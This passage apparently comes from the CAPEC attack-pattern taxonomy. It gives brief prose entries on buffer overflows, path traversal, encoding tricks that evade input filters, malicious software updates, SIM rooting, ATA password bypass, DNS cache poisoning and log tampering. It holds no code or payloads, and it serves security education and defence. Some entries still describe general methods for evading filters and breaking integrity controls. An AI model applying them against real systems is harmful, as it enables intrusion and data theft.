1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 554 (Functionality Bypass) > 179 (Calling Micro-Services Directly)

An attacker is able to discover and query Micro-services at a web location and thereby expose the Micro-services to further exploitation by gathering information about their implementation and function. Micro-services in web pages allow portions of a page to connect to the server and update content without needing to cause the entire page to update. This allows user activity to change portions of the page more quickly without causing disruptions elsewhere.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 554 (Functionality Bypass) > 464 (Evercookie)

An attacker creates a very persistent cookie that stays present even after the user thinks it has been removed. The cookie is stored on the victim's machine in over ten places. When the victim clears the cookie cache via traditional means inside the browser, that operation removes the cookie from certain places but not others. The malicious code then replicates the cookie from all of the places where it was not deleted to all of the possible storage locations once again. So the victim again has the cookie in all of the original storage locations. In other words, failure to delete the cookie in even one location will result in the cookie's resurrection everywhere. The evercookie will also persist across different browsers because certain stores (e.g., Local Shared Objects) are shared between different browsers.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 554 (Functionality Bypass) > 465 (Transparent Proxy Abuse)

A transparent proxy serves as an intermediate between the client and the internet at large. It intercepts all requests originating from the client and forwards them to the correct location. The proxy also intercepts all responses to the client and forwards these to the client. All of this is done in a manner transparent to the client.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures)

Attack patterns in this category manipulate and exploit characteristics of system data structures in order to violate the intended usage and protections of these structures. This is done in such a way that yields either improper access to the associated system data or violations of the security properties of the system itself due to vulnerabilities in how the system processes and manages the data structures. Often, vulnerabilities and therefore exploitability of these data structures exist due to ambiguity and assumption in their design and prescribed handling.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 123 (Buffer Manipulation)

An adversary manipulates an application's interaction with a buffer in an attempt to read or modify data they shouldn't have access to. Buffer attacks are distinguished in that it is the buffer space itself that is the target of the attack rather than any code responsible for interpreting the content of the buffer. In virtually all buffer attacks the content that is placed in the buffer is immaterial. Instead, most buffer attacks involve retrieving or providing more input than can be stored in the allocated buffer, resulting in the reading or overwriting of other unintended program memory.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 123 (Buffer Manipulation) > 100 (Overflow Buffers)

Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an adversary. As a consequence, an adversary is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the adversaries' choice.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 123 (Buffer Manipulation) > 100 (Overflow Buffers) > 10 (Buffer Overflow via Environment Variables)

This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the adversary finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 123 (Buffer Manipulation) > 100 (Overflow Buffers) > 14 (Client-side Injection-induced Buffer Overflow)

This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service. This hostile service is created to deliver the correct content to the client software. For example, if the client-side application is a browser, the service will host a webpage that the browser loads.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 123 (Buffer Manipulation) > 100 (Overflow Buffers) > 24 (Filter Failure through Buffer Overflow)

In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow) and hoping that the filter does not fail securely (i.e. the user input is let into the system unfiltered).

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 123 (Buffer Manipulation) > 100 (Overflow Buffers) > 256 (SOAP Array Overflow)

An attacker sends a SOAP request with an array whose actual length exceeds the length indicated in the request. If the server processing the transmission naively trusts the specified size, then an attacker can intentionally understate the size of the array, possibly resulting in a buffer overflow if the server attempts to read the entire data set into the memory it allocated for a smaller array.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 123 (Buffer Manipulation) > 100 (Overflow Buffers) > 42 (MIME Conversion)

An attacker exploits a weakness in the MIME conversion routine to cause a buffer overflow and gain control over the mail server machine. The MIME system is designed to allow various different information formats to be interpreted and sent via e-mail. Attack points exist when data are converted to MIME compatible format and back.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 123 (Buffer Manipulation) > 100 (Overflow Buffers) > 44 (Overflow Binary Resource File)

An attack of this type exploits a buffer overflow vulnerability in the handling of binary resources. Binary resources may include music files like MP3, image files like JPEG files, and any other binary file. These attacks may pass unnoticed to the client machine through normal usage of files, such as a browser loading a seemingly innocent JPEG file. This can allow the adversary access to the execution stack and execute arbitrary code in the target process.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 123 (Buffer Manipulation) > 100 (Overflow Buffers) > 45 (Buffer Overflow via Symbolic Links)

This type of attack leverages the use of symbolic links to cause buffer overflows. An adversary can try to create or manipulate a symbolic link file such that its contents result in out of bounds data. When the target software processes the symbolic link file, it could potentially overflow internal buffers with insufficient bounds checking.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 123 (Buffer Manipulation) > 100 (Overflow Buffers) > 46 (Overflow Variables and Tags)

This type of attack leverages the use of tags or variables from a formatted configuration data to cause buffer overflow. The adversary crafts a malicious HTML page or configuration file that includes oversized strings, thus causing an overflow.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 123 (Buffer Manipulation) > 100 (Overflow Buffers) > 47 (Buffer Overflow via Parameter Expansion)

In this attack, the target software is given input that the adversary knows will be modified and expanded in size during processing. This attack relies on the target software failing to anticipate that the expanded data may exceed some internal limit, thereby creating a buffer overflow.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 123 (Buffer Manipulation) > 100 (Overflow Buffers) > 67 (String Format Overflow in syslog())

This attack targets applications and software that uses the syslog() function insecurely. If an application does not explicitely use a format string parameter in a call to syslog(), user input can be placed in the format string parameter leading to a format string injection attack. Adversaries can then inject malicious format string commands into the function call leading to a buffer overflow. There are many reported software vulnerabilities with the root cause being a misuse of the syslog() function.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 123 (Buffer Manipulation) > 100 (Overflow Buffers) > 8 (Buffer Overflow in an API Call)

This attack targets libraries or shared code modules which are vulnerable to buffer overflow attacks. An adversary who has knowledge of known vulnerable libraries or shared code can easily target software that makes use of these libraries. All clients that make use of the code library thus become vulnerable by association. This has a very broad effect on security across a system, usually affecting more than one software process.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 123 (Buffer Manipulation) > 100 (Overflow Buffers) > 9 (Buffer Overflow in Local Command-Line Utilities)

This attack targets command-line utilities available in a number of shells. An adversary can leverage a vulnerability found in a command-line utility to escalate privilege to root.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 123 (Buffer Manipulation) > 540 (Overread Buffers)

An adversary attacks a target by providing input that causes an application to read beyond the boundary of a defined buffer. This typically occurs when a value influencing where to start or stop reading is set to reflect positions outside of the valid memory location of the buffer. This type of attack may result in exposure of sensitive information, a system crash, or arbitrary code execution.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 124 (Shared Resource Manipulation)

An adversary exploits a resource shared between multiple applications, an application pool or hardware pin multiplexing to affect behavior. Resources may be shared between multiple applications or between multiple threads of a single application. Resource sharing is usually accomplished through mutual access to a single memory location or multiplexed hardware pins. If an adversary can manipulate this shared resource (usually by co-opting one of the applications or threads) the other applications or threads using the shared resource will often continue to trust the validity of the compromised shared resource and use it in their calculations. This can result in invalid trust assumptions, corruption of additional data through the normal operations of the other users of the shared resource, or even cause a crash or compromise of the sharing applications.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 129 (Pointer Manipulation)

This attack pattern involves an adversary manipulating a pointer within a target application resulting in the application accessing an unintended memory location. This can result in the crashing of the application or, for certain pointer values, access to data that would not normally be possible or the execution of arbitrary code. Since pointers are simply integer variables, Integer Attacks may often be used in Pointer Attacks.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 153 (Input Data Manipulation)

An attacker exploits a weakness in input validation by controlling the format, structure, and composition of data to an input-processing interface. By supplying input of a non-standard or unexpected form an attacker can adversely impact the security of the target.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 153 (Input Data Manipulation) > 126 (Path Traversal)

An adversary uses path manipulation methods to exploit insufficient input validation of a target to obtain access to data that should be not be retrievable by ordinary well-formed requests. A typical variety of this attack involves specifying a path to a desired file together with dot-dot-slash characters, resulting in the file access API or function traversing out of the intended directory structure and into the root file system. By replacing or modifying the expected path information the access function or API retrieves the file desired by the attacker. These attacks either involve the attacker providing a complete path to a targeted file or using control characters (e.g. path separators (/ or \) and/or dots (.)) to reach desired directories or files.Directory Traversal

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 153 (Input Data Manipulation) > 126 (Path Traversal) > 139 (Relative Path Traversal)

An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 153 (Input Data Manipulation) > 126 (Path Traversal) > 597 (Absolute Path Traversal)

An adversary with access to file system resources, either directly or via application logic, will use various file absolute paths and navigation mechanisms such as ".." to extend their range of access to inappropriate areas of the file system. The goal of the adversary is to access directories and files that are intended to be restricted from their access.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 153 (Input Data Manipulation) > 126 (Path Traversal) > 76 (Manipulating Web Input to File System Calls)

An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 153 (Input Data Manipulation) > 128 (Integer Attacks)

An attacker takes advantage of the structure of integer variables to cause these variables to assume values that are not expected by an application. For example, adding one to the largest positive integer in a signed integer variable results in a negative number. Negative numbers may be illegal in an application and the application may prevent an attacker from providing them directly, but the application may not consider that adding two positive numbers can create a negative number do to the structure of integer storage formats.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 153 (Input Data Manipulation) > 128 (Integer Attacks) > 92 (Forced Integer Overflow)

This attack forces an integer variable to go out of range. The integer variable is often used as an offset such as size of memory allocation or similarly. The attacker would typically control the value of such variable and try to get it out of range. For instance the integer in question is incremented past the maximum possible value, it may wrap to become a very small, or negative number, therefore providing a very incorrect value which can lead to unexpected behavior. At worst the attacker can execute arbitrary code.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 153 (Input Data Manipulation) > 267 (Leverage Alternate Encoding)

An adversary leverages the possibility to encode potentially harmful input or content used by applications such that the applications are ineffective at validating this encoding standard.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 153 (Input Data Manipulation) > 267 (Leverage Alternate Encoding) > 120 (Double Encoding)

The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) by interpreters on the target.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 153 (Input Data Manipulation) > 267 (Leverage Alternate Encoding) > 3 (Using Leading 'Ghost' Character Sequences to Bypass Input Filters)

Some APIs will strip certain leading characters from a string of parameters. An adversary can intentionally introduce leading "ghost" characters (extra characters that don't affect the validity of the request at the API layer) that enable the input to pass the filters and therefore process the adversary's input. This occurs when the targeted API will accept input data in several syntactic forms and interpret it in the equivalent semantic way, while the filter does not take into account the full spectrum of the syntactic forms acceptable to the targeted API.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 153 (Input Data Manipulation) > 267 (Leverage Alternate Encoding) > 4 (Using Alternative IP Address Encodings)

This attack relies on the adversary using unexpected formats for representing IP addresses. Networked applications may expect network location information in a specific format, such as fully qualified domains names (FQDNs), URL, IP address, or IP Address ranges. If the location information is not validated against a variety of different possible encodings and formats, the adversary can use an alternate format to bypass application access control.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 153 (Input Data Manipulation) > 267 (Leverage Alternate Encoding) > 43 (Exploiting Multiple Input Interpretation Layers)

An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: <parser1> --> <input validator> --> <parser2>. In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 153 (Input Data Manipulation) > 267 (Leverage Alternate Encoding) > 52 (Embedding NULL Bytes)

An adversary embeds one or more null bytes in input to the target software. This attack relies on the usage of a null-valued byte as a string terminator in many environments. The goal is for certain components of the target software to stop processing the input when it encounters the null byte(s).

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 153 (Input Data Manipulation) > 267 (Leverage Alternate Encoding) > 53 (Postfix, Null Terminate, and Backslash)

If a string is passed through a filter of some kind, then a terminal NULL may not be valid. Using alternate representation of NULL allows an adversary to embed the NULL mid-string while postfixing the proper data so that the filter is avoided. One example is a filter that looks for a trailing slash character. If a string insertion is possible, but the slash must exist, an alternate encoding of NULL in mid-string may be used.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 153 (Input Data Manipulation) > 267 (Leverage Alternate Encoding) > 64 (Using Slashes and URL Encoding Combined to Bypass Validation Logic)

This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 153 (Input Data Manipulation) > 267 (Leverage Alternate Encoding) > 71 (Using Unicode Encoding to Bypass Validation Logic)

An attacker may provide a Unicode string to a system component that is not Unicode aware and use that to circumvent the filter or cause the classifying mechanism to fail to properly understanding the request. That may allow the attacker to slip malicious data past the content filter and/or possibly cause the application to route the request incorrectly.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 153 (Input Data Manipulation) > 267 (Leverage Alternate Encoding) > 72 (URL Encoding)

This attack targets the encoding of the URL. An adversary can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 153 (Input Data Manipulation) > 267 (Leverage Alternate Encoding) > 78 (Using Escaped Slashes in Alternate Encoding)

This attack targets the use of the backslash in alternate encoding. An adversary can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. By using that trick, the adversary tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 153 (Input Data Manipulation) > 267 (Leverage Alternate Encoding) > 79 (Using Slashes in Alternate Encoding)

This attack targets the encoding of the Slash characters. An adversary would try to exploit common filtering problems related to the use of the slashes characters to gain access to resources on the target host. Directory-driven systems, such as file systems and databases, typically use the slash character to indicate traversal between directories or other container components. For murky historical reasons, PCs (and, as a result, Microsoft OSs) choose to use a backslash, whereas the UNIX world typically makes use of the forward slash. The schizophrenic result is that many MS-based systems are required to understand both forms of the slash. This gives the adversary many opportunities to discover and abuse a number of common filtering problems. The goal of this pattern is to discover server software that only applies filters to one version, but not the other.

1000 (Mechanisms of Attack) > 255 (Manipulate Data Structures) > 153 (Input Data Manipulation) > 267 (Leverage Alternate Encoding) > 80 (Using UTF-8 Encoding to Bypass Validation Logic)

This attack is a specific variation on leveraging alternate encodings to bypass validation logic. This attack leverages the possibility to encode potentially harmful input in UTF-8 and submit it to applications not expecting or effective at validating this encoding standard making input filtering difficult. UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. Legal UTF-8 characters are one to four bytes long. However, early version of the UTF-8 specification got some entries wrong (in some cases it permitted overlong characters). UTF-8 encoders are supposed to use the "shortest possible" encoding, but naive decoders may accept encodings that are longer than necessary. According to the RFC 3629, a particularly subtle form of this attack can be carried out against a parser which performs security-critical validity checks against the UTF-8 encoded form of its input, but interprets certain illegal octet sequences as characters.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources)

Attack patterns within this category focus on the adversary's ability to manipulate one or more resources in order to achieve a desired outcome. This is a broad class of attacks wherein the attacker is able to change some aspect of a resource's state or availability and thereby affect system behavior or information integrity. Examples of resources include files, applications, libraries, infrastructure, and configuration information. Outcomes can range from vandalism and reduction in service to the execution of arbitrary code on the target machine.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 184 (Software Integrity Attack)

An attacker initiates a series of events designed to cause a user, program, server, or device to perform actions which undermine the integrity of software code, device data structures, or device firmware, achieving the modification of the target's integrity to achieve an insecure state.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 184 (Software Integrity Attack) > 185 (Malicious Software Download)

An attacker uses deceptive methods to cause a user or an automated process to download and install dangerous code that originates from an attacker controlled source. There are several variations to this strategy of attack.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 184 (Software Integrity Attack) > 186 (Malicious Software Update)

An adversary uses deceptive methods to cause a user or an automated process to download and install dangerous code believed to be a valid update that originates from an adversary controlled source.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 184 (Software Integrity Attack) > 186 (Malicious Software Update) > 187 (Malicious Automated Software Update via Redirection)

An attacker exploits two layers of weaknesses in server or client software for automated update mechanisms to undermine the integrity of the target code-base. The first weakness involves a failure to properly authenticate a server as a source of update or patch content. This type of weakness typically results from authentication mechanisms which can be defeated, allowing a hostile server to satisfy the criteria that establish a trust relationship. The second weakness is a systemic failure to validate the identity and integrity of code downloaded from a remote location, hence the inability to distinguish malicious code from a legitimate update.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 184 (Software Integrity Attack) > 186 (Malicious Software Update) > 533 (Malicious Manual Software Update)

An attacker introduces malicious code to the victim's system by altering the payload of a software update, allowing for additional compromise or site disruption at the victim location. These manual, or user-assisted attacks, vary from requiring the user to download and run an executable, to as streamlined as tricking the user to click a URL. Attacks which aim at penetrating a specific network infrastructure often rely upon secondary attack methods to achieve the desired impact. Spamming, for example, is a common method employed as an secondary attack vector. Thus the attacker has in their arsenal a choice of initial attack vectors ranging from traditional SMTP/POP/IMAP spamming and its varieties, to web-application mechanisms which commonly implement both chat and rich HTML messaging within the user interface.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 184 (Software Integrity Attack) > 186 (Malicious Software Update) > 614 (Rooting SIM Cards)

SIM cards are the de facto trust anchor of mobile devices worldwide. The cards protect the mobile identity of subscribers, associate devices with phone numbers, and increasingly store payment credentials, for example in NFC-enabled phones with mobile wallets. This attack leverages over-the-air (OTA) updates deployed via cryptographically-secured SMS messages to deliver executable code to the SIM. By cracking the DES key, an attacker can send properly signed binary SMS messages to a device, which are treated as Java applets and are executed on the SIM. These applets are allowed to send SMS, change voicemail numbers, and query the phone location, among many other predefined functions. These capabilities alone provide plenty of potential for abuse.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 184 (Software Integrity Attack) > 186 (Malicious Software Update) > 657 (Malicious Automated Software Update via Spoofing)

An attackers uses identify or content spoofing to trick a client into performing an automated software update from a malicious source. A malicious automated software update that leverages spoofing can include content or identity spoofing as well as protocol spoofing. Content or identity spoofing attacks can trigger updates in software by embedding scripted mechanisms within a malicious web page, which masquerades as a legitimate update source. Scripting mechanisms communicate with software components and trigger updates from locations specified by the attackers' server. The result is the client believing there is a legitimate software update available but instead downloading a malicious update from the attacker.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 184 (Software Integrity Attack) > 663 (Exploitation of Transient Instruction Execution)

An adversary exploits a hardware design flaw in a CPU implementation of transient instruction execution to expose sensitive data and bypass/subvert access control over restricted resources. Typically, the adversary conducts a covert channel attack to target non-discarded microarchitectural changes caused by transient executions such as speculative execution, branch prediction, instruction pipelining, and/or out-of-order execution. The transient execution results in a series of instructions (gadgets) which construct covert channel and access/transfer the secret data.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 184 (Software Integrity Attack) > 663 (Exploitation of Transient Instruction Execution) > 696 (Load Value Injection)

An adversary exploits a hardware design flaw in a CPU implementation of transient instruction execution in which a faulting or assisted load instruction transiently forwards adversary-controlled data from microarchitectural buffers. By inducing a page fault or microcode assist during victim execution, an adversary can force legitimate victim execution to operate on the adversary-controlled data which is stored in the microarchitectural buffers. The adversary can then use existing code gadgets and side channel analysis to discover victim secrets that have not yet been flushed from microarchitectural state or hijack the system control flow.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 184 (Software Integrity Attack) > 669 (Alteration of a Software Update)

An adversary with access to an organization’s software update infrastructure inserts malware into the content of an outgoing update to fielded systems where a wide range of malicious effects are possible. With the same level of access, the adversary can alter a software update to perform specific malicious acts including granting the adversary control over the software’s normal functionality.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 440 (Hardware Integrity Attack)

An adversary exploits a weakness in the system maintenance process and causes a change to be made to a technology, product, component, or sub-component or a new one installed during its deployed use at the victim location for the purpose of carrying out an attack.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 440 (Hardware Integrity Attack) > 401 (Physically Hacking Hardware)

An adversary exploits a weakness in access control to gain access to currently installed hardware and precedes to implement changes or secretly replace a hardware component which undermines the system's integrity for the purpose of carrying out an attack.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 440 (Hardware Integrity Attack) > 401 (Physically Hacking Hardware) > 402 (Bypassing ATA Password Security)

An adversary exploits a weakness in ATA security on a drive to gain access to the information the drive contains without supplying the proper credentials. ATA Security is often employed to protect hard disk information from unauthorized access. The mechanism requires the user to type in a password before the BIOS is allowed access to drive contents. Some implementations of ATA security will accept the ATA command to update the password without the user having authenticated with the BIOS. This occurs because the security mechanism assumes the user has first authenticated via the BIOS prior to sending commands to the drive. Various methods exist for exploiting this flaw, the most common being installing the ATA protected drive into a system lacking ATA security features (a.k.a. hot swapping). Once the drive is installed into the new system the BIOS can be used to reset the drive password.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 440 (Hardware Integrity Attack) > 534 (Malicious Hardware Update)

An adversary introduces malicious hardware during an update or replacement procedure, allowing for additional compromise or site disruption at the victim location. After deployment, it is not uncommon for upgrades and replacements to occur involving hardware and various replaceable parts. These upgrades and replacements are intended to correct defects, provide additional features, and to replace broken or worn-out parts. However, by forcing or tricking the replacement of a good component with a defective or corrupted component, an adversary can leverage known defects to obtain a desired malicious impact.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 440 (Hardware Integrity Attack) > 534 (Malicious Hardware Update) > 531 (Hardware Component Substitution)

An attacker substitutes out a tested and approved hardware component for a maliciously-altered hardware component. This type of attack is carried out directly on the system, enabling the attacker to then cause disruption or additional compromise.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 440 (Hardware Integrity Attack) > 534 (Malicious Hardware Update) > 531 (Hardware Component Substitution) > 530 (Provide Counterfeit Component)

An attacker provides a counterfeit component during the procurement process of a lower-tier component supplier to a sub-system developer or integrator, which is then built into the system being upgraded or repaired by the victim, allowing the attacker to cause disruption or additional compromise.

An attacker maliciously alters hardware components that will be sold on the gray market, allowing for victim disruption and compromise when the victim needs replacement hardware components for systems where the parts are no longer in regular supply from original suppliers, or where the hardware components from the attacker seems to be a great benefit from a cost perspective.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 440 (Hardware Integrity Attack) > 534 (Malicious Hardware Update) > 677 (Server Motherboard Compromise)

Malware is inserted in a server motherboard (e.g., in the flash memory) in order to alter server functionality from that intended. The development environment or hardware/software support activity environment is susceptible to an adversary inserting malicious software into hardware components during development or update.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 161 (Infrastructure Manipulation)

An attacker exploits characteristics of the infrastructure of a network entity in order to perpetrate attacks or information gathering on network objects or effect a change in the ordinary information flow between network objects. Most often, this involves manipulation of the routing of network messages so, instead of arriving at their proper destination, they are directed towards an entity of the attackers' choosing, usually a server controlled by the attacker. The victim is often unaware that their messages are not being processed correctly. For example, a targeted client may believe they are connecting to their own bank but, in fact, be connecting to a Pharming site controlled by the attacker which then collects the user's login information in order to hijack the actual bank account.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 161 (Infrastructure Manipulation) > 141 (Cache Poisoning)

An attacker exploits the functionality of cache technologies to cause specific data to be cached that aids the attackers' objectives. This describes any attack whereby an attacker places incorrect or harmful material in cache. The targeted cache can be an application's cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache). Until the cache is refreshed, most applications or clients will treat the corrupted cache value as valid. This can lead to a wide range of exploits including redirecting web browsers towards sites that install malware and repeatedly incorrect calculations based on the incorrect value.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 161 (Infrastructure Manipulation) > 141 (Cache Poisoning) > 142 (DNS Cache Poisoning)

A domain name server translates a domain name (such as www.example.com) into an IP address that Internet hosts use to contact Internet resources. An adversary modifies a public DNS cache to cause certain names to resolve to incorrect addresses that the adversary specifies. The result is that client applications that rely upon the targeted cache for domain name resolution will be directed not to the actual address of the specified domain name but to some other address. Adversaries can use this to herd clients to sites that install malware on the victim's computer or to masquerade as part of a Pharming attack.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 161 (Infrastructure Manipulation) > 166 (Force the System to Reset Values)

An attacker forces the target into a previous state in order to leverage potential weaknesses in the target dependent upon a prior configuration or state-dependent factors. Even in cases where an attacker may not be able to directly control the configuration of the targeted application, they may be able to reset the configuration to a prior state since many applications implement reset functions.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 161 (Infrastructure Manipulation) > 268 (Audit Log Manipulation)

The attacker injects, manipulates, deletes, or forges malicious log entries into the log file, in an attempt to mislead an audit of the log file or cover tracks of an attack. Due to either insufficient access controls of the log files or the logging mechanism, the attacker is able to perform such actions.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 161 (Infrastructure Manipulation) > 268 (Audit Log Manipulation) > 81 (Web Server Logs Tampering)

Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to "Log Injection-Tampering-Forging" except that in this case, the attack is targeting the logs of the web server and not the application.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 161 (Infrastructure Manipulation) > 268 (Audit Log Manipulation) > 93 (Log Injection-Tampering-Forging)

This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing them to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non-repudiation and incident forensics capability.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 161 (Infrastructure Manipulation) > 481 (Contradictory Destinations in Traffic Routing Schemes)

Adversaries can provide contradictory destinations when sending messages. Traffic is routed in networks using the domain names in various headers available at different levels of the OSI model. In a Content Delivery Network (CDN) multiple domains might be available, and if there are contradictory domain names provided it is possible to route traffic to an inappropriate destination. The technique, called Domain Fronting, involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. An alternative technique, called Domainless Fronting, is similar, but the SNI field is left blank.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 161 (Infrastructure Manipulation) > 571 (Block Logging to Central Repository)

An adversary prevents host-generated logs being delivered to a central location in an attempt to hide indicators of compromise.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 161 (Infrastructure Manipulation) > 700 (Network Boundary Bridging)

An adversary which has gained elevated access to network boundary devices may use these devices to create a channel to bridge trusted and untrusted networks. Boundary devices do not necessarily have to be on the network’s edge, but rather must serve to segment portions of the target network the adversary wishes to cross into.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 165 (File Manipulation)

An attacker modifies file contents or attributes (such as extensions or names) of files in a manner to cause incorrect processing by an application. Attackers use this class of attacks to cause applications to enter unstable states, overwrite or expose sensitive information, and even execute arbitrary code with the application's privileges. This class of attacks differs from attacks on configuration information (even if file-based) in that file manipulation causes the file processing to result in non-standard behaviors, such as buffer overflows or use of the incorrect interpreter. Configuration attacks rely on the application interpreting files correctly in order to insert harmful configuration information. Likewise, resource location attacks rely on controlling an application's ability to locate files, whereas File Manipulation attacks do not require the application to look in a non-default location, although the two classes of attacks are often combined.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 165 (File Manipulation) > 572 (Artificially Inflate File Sizes)

